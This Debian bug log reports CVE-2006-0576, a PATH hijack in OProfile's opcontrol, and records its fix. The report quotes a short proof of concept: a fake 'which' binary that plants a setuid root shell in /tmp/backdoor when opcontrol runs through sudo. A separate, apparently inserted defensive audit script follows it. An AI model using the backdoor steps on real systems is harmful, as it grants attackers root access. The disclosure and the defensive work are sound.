Debian Bug report logs - #352910
CVE-2006-0576: Untrusted search path vulnerability in opcontrol in OProfile 0.9.1

Package: oprofile; Maintainer for oprofile is (unknown);

Reported by: Micah Anderson <micah@debian.org>

Date: Wed, 15 Feb 2006 05:18:21 UTC

Severity: normal

Fixed in version oprofile/0.9.1-9

Done: Al Stone <ahs3@debian.org>

Bug is archived. No further changes may be made.


Report forwarded to debian-bugs-dist@lists.debian.org, Al Stone <ahs3@debian.org>:
Bug#352910; Package oprofile.


Acknowledgement sent to Micah Anderson <micah@debian.org>:
New Bug report received and forwarded. Copy sent to Al Stone <ahs3@debian.org>.


Message #5 received at submit@bugs.debian.org:

From: Micah Anderson <micah@debian.org>
To: Debian Bug Tracking System <submit@bugs.debian.org>
Subject: CVE-2006-0576: Untrusted search path vulnerability in opcontrol in OProfile 0.9.1
Date: Wed, 15 Feb 2006 00:04:13 -0500
Package: oprofile
Severity: normal

CVE-2006-0576 reads:

Untrusted search path vulnerability in opcontrol in OProfile 0.9.1 and
earlier allows local users to execute arbitrary commands via a modified
PATH that references malicious (1) which or (2) dirname programs.
NOTE: while opcontrol normally is not run setuid, a common configuration
suggests accessing opcontrol using sudo. In such a context, this is a
vulnerability.

Giving sudo to oprofile is apparently a very common practice.

From the original report:

Whoever coded the script tried protecting it against executing binaries
out of a safe PATH by defining one on line 1416:

    PATH=/usr/local/bin:/usr/local/sbin:/bin:/sbin:/usr/bin:/usr/sbin

The problem is that this script does not check where the 'which' or
'dirname' binary is executed from on line 1413/1414.

This enables a malicious user to execute arbitrary code by using the
following pseudo'exploit':

    cat > which
    #!/bin/sh
    /bin/cp /bin/bash /tmp/backdoor
    /bin/chmod 6755 /tmp/backdoor
    ^C
    set PATH="."
    /usr/bin/sudo /usr/local/bin/opcontrol

This is a relatively low severity vulnerability, but easily fixed.

-- System Information:
Debian Release: testing/unstable
  APT prefers unstable
  APT policy: (500, 'unstable'), (500, 'testing'), (500, 'stable')
Architecture: i386 (i686)
Shell:  /bin/sh linked to /bin/bash
Kernel: Linux 2.6.15-1-686-smp
Locale: LANG=en_US, LC_CTYPE=en_US (charmap=ISO-8859-1)
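
The ordering problem described in the report above (lookups on lines 1413/1414, PATH set on line 1416) can be checked mechanically. The script below is an added example, not OProfile code and not the upstream patch; `audit_path_order`, `write_samples` and both sample scripts are constructed for illustration.

```shell
#!/bin/sh
# Added example, not OProfile code: flag commands that a script looks up
# through the caller's PATH before it pins its own PATH.

# audit_path_order SCRIPT [CMD...]   (default CMDs: which dirname)
# Prints "LINE:CMD" for each CMD used without an absolute path before the
# first PATH= assignment. Line-based heuristic; comment lines are skipped.
audit_path_order() {
    script=$1; shift
    [ $# -gt 0 ] || set -- which dirname
    awk -v cmds="$*" '
        BEGIN { n = split(cmds, want, " ") }
        /^[ \t]*#/ { next }
        /^[ \t]*(export[ \t]+)?PATH=/ { exit }
        {
            line = " " $0 " "    # pad so a name at either end still matches
            for (i = 1; i <= n; i++)
                if (line ~ ("[^/A-Za-z0-9_.-]" want[i] "[^A-Za-z0-9_.-]"))
                    print NR ":" want[i]
        }
    ' "$script"
}

# Constructed samples modelled on the report's description; the real
# opcontrol lines are not shown in this bug log.
write_samples() {
    cat > "$1/before.sh" <<'EOF'
#!/bin/sh
SELF=`which "$0"`
DIR=`dirname "$SELF"`
PATH=/usr/local/bin:/usr/local/sbin:/bin:/sbin:/usr/bin:/usr/sbin
EOF
    cat > "$1/after.sh" <<'EOF'
#!/bin/sh
PATH=/usr/local/bin:/usr/local/sbin:/bin:/sbin:/usr/bin:/usr/sbin
export PATH
SELF=`which "$0"`
DIR=`dirname "$SELF"`
EOF
}

demo() {
    tmp=$(mktemp -d) || return 1
    write_samples "$tmp"
    echo "before.sh: $(audit_path_order "$tmp/before.sh" | tr '\n' ' ')"
    echo "after.sh:  $(audit_path_order "$tmp/after.sh" | tr '\n' ' ')"
    rm -rf "$tmp"
}
demo
```

The check is line-based and only catches the ordering problem this report describes. On the sudo side, the `env_reset` and `secure_path` sudoers options also keep a caller's PATH from reaching the script.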



Information forwarded to debian-bugs-dist@lists.debian.org, Al Stone <ahs3@debian.org>:
Bug#352910; Package oprofile.


Acknowledgement sent to ahs3@fc.hp.com:
Extra info received and forwarded to list. Copy sent to Al Stone <ahs3@debian.org>.


Message #10 received at 352910@bugs.debian.org:

From: Al Stone <ahs3@fc.hp.com>
To: Micah Anderson <micah@debian.org>, 352910@bugs.debian.org
Subject: Re: Bug#352910: CVE-2006-0576: Untrusted search path vulnerability in opcontrol in OProfile 0.9.1
Date: Wed, 15 Feb 2006 08:59:45 -0700

On Wed, 2006-02-15 at 00:04 -0500, Micah Anderson wrote:
> Package: oprofile
> Severity: normal
> 
> CVE-2006-0576 reads:
> 
> Untrusted search path vulnerability in opcontrol in OProfile 0.9.1 and
> earlier allows local users to execute arbitrary commands via a modified
> PATH that references malicious (1) which or (2) dirname programs.
> NOTE: while opcontrol normally is not run setuid, a common configuration
> suggests accessing opcontrol using sudo. In such a context, this is a
> vulnerability.

Thanks for the report; a patch has been suggested upstream and
appears to be acceptable.  I'll get that incorporated and uploaded
quickly.

-- 
Ciao,
al
----------------------------------------------------------------------
Al Stone                                      Alter Ego:
Open Source and Linux R&D                     Debian Developer
Hewlett-Packard Company                       http://www.debian.org
E-mail: ahs3@fc.hp.com                        ahs3@debian.org
----------------------------------------------------------------------




Reply sent to Al Stone <ahs3@debian.org>:
You have taken responsibility.


Notification sent to Micah Anderson <micah@debian.org>:
Bug acknowledged by developer.


Message #15 received at 352910-close@bugs.debian.org:

From: Al Stone <ahs3@debian.org>
To: 352910-close@bugs.debian.org
Subject: Bug#352910: fixed in oprofile 0.9.1-9
Date: Fri, 17 Feb 2006 10:47:13 -0800
Source: oprofile
Source-Version: 0.9.1-9

We believe that the bug you reported is fixed in the latest version of
oprofile, which is due to be installed in the Debian FTP archive:

oprofile-common_0.9.1-9_i386.deb
  to pool/main/o/oprofile/oprofile-common_0.9.1-9_i386.deb
oprofile-gui_0.9.1-9_i386.deb
  to pool/main/o/oprofile/oprofile-gui_0.9.1-9_i386.deb
oprofile-source_0.9.1-9_i386.deb
  to pool/main/o/oprofile/oprofile-source_0.9.1-9_i386.deb
oprofile_0.9.1-9.diff.gz
  to pool/main/o/oprofile/oprofile_0.9.1-9.diff.gz
oprofile_0.9.1-9.dsc
  to pool/main/o/oprofile/oprofile_0.9.1-9.dsc
oprofile_0.9.1-9_i386.deb
  to pool/main/o/oprofile/oprofile_0.9.1-9_i386.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 352910@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Al Stone <ahs3@debian.org> (supplier of updated oprofile package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Format: 1.7
Date: Fri, 17 Feb 2006 11:22:41 -0700
Source: oprofile
Binary: oprofile-common oprofile oprofile-gui oprofile-source
Architecture: source i386
Version: 0.9.1-9
Distribution: unstable
Urgency: low
Maintainer: Al Stone <ahs3@debian.org>
Changed-By: Al Stone <ahs3@debian.org>
Description: 
 oprofile   - system-wide profiler for Linux systems
 oprofile-common - system-wide profiler for Linux systems (command line components)
 oprofile-gui - system-wide profiler for Linux systems (GUI components)
 oprofile-source - Source for the OProfile driver
Closes: 352910
Changes: 
 oprofile (0.9.1-9) unstable; urgency=low
 .
   * Closes: bug#352910 -- CVE-2006-0576: Untrusted search path vulnerability
     in opcontrol (re-used patch from CVS HEAD)
Files: 
 7bddc1ebdb61867f4ad6601d39a6da77 787 devel optional oprofile_0.9.1-9.dsc
 822e869f229113ac639ee17f0eaf48a7 106206 devel optional oprofile_0.9.1-9.diff.gz
 b244e34676db8dcc704344a58648ba7b 182916 devel optional oprofile_0.9.1-9_i386.deb
 84322859101c6f34371a0694658d6e6c 3894534 devel optional oprofile-common_0.9.1-9_i386.deb
 fd0ef7adb004cd23a0c32cf15dc2f607 88680 devel optional oprofile-gui_0.9.1-9_i386.deb
 f302e67e3d8b6dd0036171614637a201 342942 devel optional oprofile-source_0.9.1-9_i386.deb

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (GNU/Linux)

iD8DBQFD9hbSso6+T7qY4V0RApc5AJ40xUJ2LCcaoFoOXRwN9PjLpvDDoQCeKy+0
j+hpb2VmmyDdqveihUr0qhk=
=bwj5
-----END PGP SIGNATURE-----




Bug archived. Request was from Debbugs Internal Request <owner@bugs.debian.org> to internal_control@bugs.debian.org. (Sun, 24 Jun 2007 14:01:06 GMT)



Debian bug tracking system administrator <owner@bugs.debian.org>. Last modified: Fri Jan 5 08:43:49 2018; Machine Name: beach
